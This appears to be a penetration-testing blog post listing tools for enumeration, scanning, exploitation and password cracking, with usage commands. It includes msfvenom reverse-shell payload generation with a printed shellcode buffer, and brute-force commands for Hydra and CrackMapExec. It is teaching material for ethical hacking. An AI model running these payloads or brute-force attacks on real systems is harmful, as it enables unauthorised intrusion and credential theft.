Table of Contents
Enumeration
Information Gathering and Enumeration is the first stage for a penetration tester. Enumerating using some opensource tools speed up the process. Here are some tools commonly used by ethical hackers for enumeration.
Dmitry
Dmitry can search common information from various sources such as netcraft.com.
Basic usage:
#whois lookup, search host on netcraft,subdomain, search for emails
dmitry -i -n -s -e rednode.comDownload: https://github.com/jaygreig86/dmitry
DnsEnum
This is a tool to discover subdomain
Basic Usage:
dnsenum -u a rednode.comDownload: https://github.com/fwaeytens/dnsenum
Amass
One of favorite information gathering tool. This tool coded by OWASP.
Basic usage:
amass intel -d owasp.org -whois
#Enumeration All Subdomain
amass enum -passive -d owasp.orgDownload: https://github.com/OWASP/Amass
Metagoofil
metagoofil extract information from various documents such as pdf,doc,ppt,xls etc.
Basic Usage:
metagoofil -d rednode.com -t pdf,ppt,xlsDownload: https://github.com/opsdisk/metagoofil
Nmap
Nmap is the most popular tool used by bad and good hackers. Basically this tool used to scan for open ports, identify live host and os version, and even sometime could be used to discover vulnerabilities
Basic Usage:
Scan all ports
nmap -p 1-65535 rednode.com
nmap -p- rednode.comScan for OS and Service Version
nmap -p 1-65535 -O --osscan-guess -sV rednode.comScan with default nmap script
nmap -p 1-65535 -sC rednode.comVulnerability Scanning
nmap -Pn --script vuln rednode.comDownload: https://nmap.org/download.html
GoBuster
Usually, i use Gobuster used to brute force website directories and files, and subdomains.
gobuster dir -u $target -t 15 -w /usr/share/dirb/wordlists/common.txt -x php,txt,confDiscovering Vulnerability
To exploit a target a penetration tester need to find exploitable vulnerability. No tools is 100% accurate but obviously these pentesting tools help. Personally i don’t use lots of vulnerability scanning tools. Still i will list here some reliable and tested vulnerability scanner for future reference!
Nessus
Nessus is the most popular commercial vulnerability scanner. Nessus can be used to scan for network and web vulnerabilities.
More information: https://www.tenable.com/downloads/
Burp Suite Pro
This is a semi-manual web pentesting tool. If you are a web penetration tester the only tool you need is Burp Suite Pro. Burp Suite Free version also good. With free version i find it very slow, and some additional features is not included.
I will post another article on usage of burp suite.
Don’t take me wrong, I don’t think you need lots of tools to scan for vulnerability as long as you have Github, Exploit-db, and Google. The information you gather can be used to find vulnerability manually.
More Information: https://portswigger.net/burp/pro
WpScan
This is a tool to find vulnerability against wordpress cms. Usually, it does not fuzz anything but looks for versions, and compare with their own database
wpscan -e vp --plugins-detection aggressive --url $targetDownload: https://github.com/wpscanteam/wpscan
Exploitation
It is less likely to find exploits for every possible vulnerabilities unless the vulnerability is well-known. Usually the White hat hacker or red teamer don’t depend on a pre-built tool. But there are some tools that extremely helpful for the exploitation purpose.
Metasploit
This is the tool used by good/bad hackers for information gathering and to exploit some well-known vulnerability. I believe metasploit framework used for 4 purpose
- Reverse Shell Generator
- Shellcode Generator
- Information Gathering
- Vulnerability Exploitation
Generate a Reverse Shell payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exeGenerate Reverse Shell Shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -b "\x00" LPORT=4444 -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of py file: 2452 bytes
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x99\x73\x79\xcf\xfa\x55\x8e"
buf += b"\xce\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x65\x3b\xfa\x2b\x0a\xbd\x4e\xce\x99\x73\x38\x9e\xbb"
buf += b"\x05\xdc\x9f\xcf\x3b\x48\x1d\x9f\x1d\x05\x9c\xf9\x3b"
buf += b"\xf2\x9d\xe2\x1d\x05\x9c\xb9\x3b\xf2\xbd\xaa\x1d\x81"
buf += b"\x79\xd3\x39\x34\xfe\x33\x1d\xbf\x0e\x35\x4f\x18\xb3"
buf += b"\xf8\x79\xae\x8f\x58\xba\x74\x8e\xfb\x94\x6c\x23\xcb"
buf += b"\x32\x28\x87\x71\x07\xae\x45\xdb\x4f\x31\xce\x2a\xde"
buf += b"\x0e\x46\x99\x73\x79\x87\x7f\x95\xfa\xa9\xd1\x72\xa9"
buf += b"\x9f\x71\x1d\x96\x8a\x12\x33\x59\x86\xfb\x85\x6d\x98"
buf += b"\xd1\x8c\xb0\x8e\x71\x61\x06\x86\x98\xa5\x34\xfe\x33"
buf += b"\x1d\xbf\x0e\x35\x32\xb8\x06\xf7\x14\x8f\x0f\xa1\x93"
buf += b"\x0c\x3e\xb6\x56\xc2\xea\x91\x36\x40\x1e\x8f\x8d\xd6"
buf += b"\x8a\x12\x33\x5d\x86\xfb\x85\xe8\x8f\x12\x7f\x31\x8b"
buf += b"\x71\x15\x92\x87\x98\xa3\x38\x44\xfe\xdd\xc6\xcf\x49"
buf += b"\x32\x21\x8e\xa2\x0b\xd7\x94\xd8\x2b\x38\x96\xbb\x0f"
buf += b"\xc6\x4d\x75\x53\x38\x9d\x05\xb5\xd6\x8f\xc0\x29\x31"
buf += b"\x44\xe8\xbc\xd9\x31\x66\x8c\x24\x86\x44\x22\xfd\xfc"
buf += b"\xc6\x40\x4b\xcf\xfa\x14\xd8\x87\x10\x95\x31\x4e\x16"
buf += b"\xf5\x8f\xce\x99\x3a\xf0\x2a\xb3\xe9\x8c\xce\x88\x2f"
buf += b"\x06\xcf\xfa\x54\xcf\x9a\xd0\xfa\x9d\x83\x73\xa4\xcf"
buf += b"\x74\xd5\x04\x5f\xc8\x05\x80\xc2\x47\x73\x1b\x78\xce"
buf += b"\xfa\x55\xd7\x8f\x23\x5a\xf9\xa4\xfa\xaa\x5b\x9e\xc9"
buf += b"\x3e\x48\x06\xb7\x64\x4e\x86\x66\xb3\x31\x46\x38\x1d"
buf += b"\x71\x0e\xd1\xfa\xb8\x8e\x40\xbf\x81\x11\x79\x8c\xac"
buf += b"\x87\x73\x92\xe4\xde\xd8\x2b\x35\x46\x18\x1d\x07\x37"
buf += b"\xd8\xc9\xe0\x6a\x8e\x34\x71\x1b\xd1\xf2\xbd\x8f\xf8"
buf += b"\x55\x8e\x87\x21\x10\x14\xab\xfa\x55\x8e\xce\x99\x32"
buf += b"\x29\x8e\xaa\x1d\x07\x2c\xce\x24\x2e\x82\xcb\x95\xe4"
buf += b"\xc3\xc0\x32\x29\x2d\x06\x33\x49\x8a\xbd\x27\x78\xce"
buf += b"\xb2\xd8\xca\xea\x81\xb5\x79\xa7\xb2\xdc\x68\x98\xc9"
buf += b"\x32\x29\x8e\xaa\x14\xde\x87\x66\xb3\x38\x9f\xb3\xaa"
buf += b"\x46\x83\x10\xb2\x35\x46\x3b\x14\x34\xb7\x55\x4c\xff"
buf += b"\x30\x2f\x1d\xbf\x1c\xd1\x8c\xb3\x44\xf4\x14\x34\xc6"
buf += b"\x1e\x6e\x19\x30\x2f\xee\x7e\x7b\x3b\x25\x38\x75\x5c"
buf += b"\xc0\x33\x53\x66\xa6\x31\x4c\x3e\x7d\xb2\xc8\xe5\x79"
buf += b"\xf9\x34\x1a\x20\x8b\x75\xde\x60\x0b\xa0\x90\x55\xd7"
buf += b"\x8f\x10\xa9\x86\x1a\xfa\x55\x8e\xce"I will publish another article on metasploit usage.
SET
SET(Social Engineering Toolkit) is a open-source tool that help an attacker to exploit human.
setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer ToolkitDownload: https://github.com/trustedsec/social-engineer-toolkit
SQLMAP
Sqlmap is the most complete and advanced open-source SQL injection exploitation tool out there. I don’t think i need to tell in details about sqlmap since there are already lots of information is exist in the Internet.
Basic Usage:
python3 sqlmap.py -hh
python3 sqlmap.py -u https://rednode.com/hack.page?vuln=queryDownload: https://github.com/sqlmapproject/sqlmap
Online Search
Search exploit in different sources!
- Search Exploit On Github
- Search Exploit On Exploit-db
- Search Exploit On Packet Storm Security
Password Attack
Penetration Tester need reliable tool for effective password attack. Successfully Password cracking depend on how good you are in making of good wordlist. Here is some tools i mostly use
Cewl
Cewl is a tool to spider the target website and create custom wordlist for brute force attack.
cewl -d 3 -w dict.txt -e https://rednode.comDownload: https://github.com/digininja/CeWL
CUPP
Password is weak when peoples combine personal information for their password such as name and birth year(Like John1980). CUPP helps to create wordlist by combining personal information.
Basic Usage:
cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | [email protected] ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: RedTm
> Surname:
> Nickname:
> Birthdate (DDMMYYYY): 01121901Download: https://github.com/Mebus/cupp
Hydra
Hydra is fast online password cracker. It can brute force following services:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,
HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY,
HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener,
Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin,
Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,
SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth,
VNC and XMPP.Basically, i use this tool for quick brute ftp, http/https(head/get/post/form), ssh, and sometime other services. If someone looking for online password cracking then hydra is good enough.
Usage example:
hydra -l admin -P dictionary.txt -t 20 ftp://rednode.comBut if i need to brute web login(form), usually i use Burp Suite Pro!
Download: https://github.com/vanhauser-thc/thc-hydra
CrackMapExec
This is another small password brute forcer and it can brute force ssh, smb,ldap,mssql, and winrm.
Usage example:
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforceHashCat
Hashcat is fast and my favorite password hash cracker.
hashcat --help 255 ⨯
hashcat (v6.2.5) starting in help mode
Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
- [ Options ] -
Options Short / Long | Type | Description | Example
================================+======+======================================================+=======================
-m, --hash-type | Num | Hash-type, references below (otherwise autodetect) | -m 1000
-a, --attack-mode | Num | Attack-mode, see references below | -a 3
-V, --version | | Print version |
-h, --help | | Print help |
--quiet | | Suppress output |
--hex-charset | | Assume charset is given in hex |
--hex-salt | | Assume salt is given in hex |
--hex-wordlist | | Assume words in wordlist are given in hex |
--force | | Ignore warnings |
--deprecated-check-disable | | Enable deprecated plugins |
--status | | Enable automatic update of the status screen |
--status-json | | Enable JSON format for status output |
--status-timer | Num | Sets seconds between status screen updates to X | --status-timer=1
--stdin-timeout-abort | Num | Abort if there is no input from stdin for X seconds | --stdin-timeout-abort=300
--machine-readable | | Display the status view in a machine-readable format |
--keep-guessing | | Keep guessing the hash after it has been cracked |
--self-test-disable | | Disable self-test functionality on startup |
--loopback | | Add new plains to induct directory |
--markov-hcstat2 | File | Specify hcstat2 file to use | --markov-hcstat2=my.hcstat2
--markov-disable | | Disables markov-chains, emulates classic brute-force |
--markov-classic | | Enables classic markov-chains, no per-position |
-t, --markov-threshold | Num | Threshold X when to stop accepting new markov-chains | -t 50
--runtime | Num | Abort session after X seconds of runtime | --runtime=10
--session | Str | Define specific session name | --session=mysession
--restore | | Restore session from --session |
--restore-disable | | Do not write restore file |
--restore-file-path | File | Specific path to restore file | --restore-file-path=x.restore
-o, --outfile | File | Define outfile for recovered hash | -o outfile.txt
--outfile-format | Str | Outfile format to use, separated with commas | --outfile-format=1,3
--outfile-autohex-disable | | Disable the use of $HEX[] in output plains |
--outfile-check-timer | Num | Sets seconds between outfile checks to X | --outfile-check=30
--wordlist-autohex-disable | | Disable the conversion of $HEX[] from the wordlist |
-p, --separator | Char | Separator char for hashlists and outfile | -p :
--stdout | | Do not crack a hash, instead print candidates only |
--show | | Compare hashlist with potfile; show cracked hashes |
--left | | Compare hashlist with potfile; show uncracked hashes |
--username | | Enable ignoring of usernames in hashfile |
--remove | | Enable removal of hashes once they are cracked |
--remove-timer | Num | Update input hash file each X seconds | --remove-timer=30
--potfile-disable | | Do not write potfile |
--potfile-path | File | Specific path to potfile | --potfile-path=my.pot
--encoding-from | Code | Force internal wordlist encoding from X | --encoding-from=iso-8859-15
--encoding-to | Code | Force internal wordlist encoding to X | --encoding-to=utf-32le
--debug-mode | Num | Defines the debug mode (hybrid only by using rules) | --debug-mode=4
--debug-file | File | Output file for debugging rules | --debug-file=good.log
--induction-dir | Dir | Specify the induction directory to use for loopback | --induction=inducts
--outfile-check-dir | Dir | Specify the outfile directory to monitor for plains | --outfile-check-dir=x
--logfile-disable | | Disable the logfile |
--hccapx-message-pair | Num | Load only message pairs from hccapx matching X | --hccapx-message-pair=2
--nonce-error-corrections | Num | The BF size range to replace AP's nonce last bytes | --nonce-error-corrections=16
--keyboard-layout-mapping | File | Keyboard layout mapping table for special hash-modes | --keyb=german.hckmap
--truecrypt-keyfiles | File | Keyfiles to use, separated with commas | --truecrypt-keyf=x.png
--veracrypt-keyfiles | File | Keyfiles to use, separated with commas | --veracrypt-keyf=x.txt
--veracrypt-pim-start | Num | VeraCrypt personal iterations multiplier start | --veracrypt-pim-start=450
--veracrypt-pim-stop | Num | VeraCrypt personal iterations multiplier stop | --veracrypt-pim-stop=500
-b, --benchmark | | Run benchmark of selected hash-modes |
--benchmark-all | | Run benchmark of all hash-modes (requires -b) |
--speed-only | | Return expected speed of the attack, then quit |
--progress-only | | Return ideal progress step size and time to process |
-c, --segment-size | Num | Sets size in MB to cache from the wordfile to X | -c 32
--bitmap-min | Num | Sets minimum bits allowed for bitmaps to X | --bitmap-min=24
--bitmap-max | Num | Sets maximum bits allowed for bitmaps to X | --bitmap-max=24
--cpu-affinity | Str | Locks to CPU devices, separated with commas | --cpu-affinity=1,2,3
--hook-threads | Num | Sets number of threads for a hook (per compute unit) | --hook-threads=8
--hash-info | | Show information for each hash-mode |
--example-hashes | | Alias of --hash-info |
--backend-ignore-cuda | | Do not try to open CUDA interface on startup |
--backend-ignore-opencl | | Do not try to open OpenCL interface on startup |
-I, --backend-info | | Show info about detected backend API devices | -I
-d, --backend-devices | Str | Backend devices to use, separated with commas | -d 1
-D, --opencl-device-types | Str | OpenCL device-types to use, separated with commas | -D 1
-O, --optimized-kernel-enable | | Enable optimized kernels (limits password length) |
-M, --multiply-accel-disable | | Disable multiply kernel-accel with processor count |
-w, --workload-profile | Num | Enable a specific workload profile, see pool below | -w 3
-n, --kernel-accel | Num | Manual workload tuning, set outerloop step size to X | -n 64
-u, --kernel-loops | Num | Manual workload tuning, set innerloop step size to X | -u 256
-T, --kernel-threads | Num | Manual workload tuning, set thread count to X | -T 64
--backend-vector-width | Num | Manually override backend vector-width to X | --backend-vector=4
--spin-damp | Num | Use CPU for device synchronization, in percent | --spin-damp=10
--hwmon-disable | | Disable temperature and fanspeed reads and triggers |
--hwmon-temp-abort | Num | Abort if temperature reaches X degrees Celsius | --hwmon-temp-abort=100
--scrypt-tmto | Num | Manually override TMTO value for scrypt to X | --scrypt-tmto=3
-s, --skip | Num | Skip X words from the start | -s 1000000
-l, --limit | Num | Limit X words from the start + skipped words | -l 1000000
--keyspace | | Show keyspace base:mod values and quit |
-j, --rule-left | Rule | Single rule applied to each word from left wordlist | -j 'c'
-k, --rule-right | Rule | Single rule applied to each word from right wordlist | -k '^-'
-r, --rules-file | File | Multiple rules applied to each word from wordlists | -r rules/best64.rule
-g, --generate-rules | Num | Generate X random rules | -g 10000
--generate-rules-func-min | Num | Force min X functions per rule |
--generate-rules-func-max | Num | Force max X functions per rule |
--generate-rules-func-sel | Str | Pool of rule operators valid for random rule engine | --generate-rules-func-sel=ioTlc
--generate-rules-seed | Num | Force RNG seed set to X |
-1, --custom-charset1 | CS | User-defined charset ?1 | -1 ?l?d?u
-2, --custom-charset2 | CS | User-defined charset ?2 | -2 ?l?d?s
-3, --custom-charset3 | CS | User-defined charset ?3 |
-4, --custom-charset4 | CS | User-defined charset ?4 |
--identify | | Shows all supported algorithms for input hashes | --identify my.hash
-i, --increment | | Enable mask increment mode |
--increment-min | Num | Start mask incrementing at X | --increment-min=4
--increment-max | Num | Stop mask incrementing at X | --increment-max=8
-S, --slow-candidates | | Enable slower (but advanced) candidate generators |
--brain-server | | Enable brain server |
--brain-server-timer | Num | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
-z, --brain-client | | Enable brain client, activates -S |
--brain-client-features | Num | Define brain client features, see below | --brain-client-features=3
--brain-host | Str | Brain server host (IP or domain) | --brain-host=127.0.0.1
--brain-port | Port | Brain server port | --brain-port=13743
--brain-password | Str | Brain server authentication password | --brain-password=bZfhCvGUSjRq
--brain-session | Hex | Overrides automatically calculated brain session | --brain-session=0x2ae611db
--brain-session-whitelist | Hex | Allow given sessions only, separated with commas | --brain-session-whitelist=0x2ae611dbThe usage example can be found here.
Download: https://github.com/hashcat/hashcat
Other Interesting Tools
- Aircrack suites for wireless pentesting: https://www.aircrack-ng.org/
- Wireshark is the sniffer: https://www.wireshark.org/download.html
- SqlNinja(Another sql injection tool): http://sqlninja.sourceforge.net/index.html
- beef-xss is for exploiting XSS and browser: https://github.com/beefproject/beef/
- SecLists(Fuzzing Payloads and worldlists): https://github.com/danielmiessler/SecLists
Commercial Tools
There are some good commercial tools used. Well-known are:
- Core Impact: This is the most popular commercial tool.
- Canvas: Another commercial tool written in python.
- Metasploit Pro: Professional Verson of metasploit.
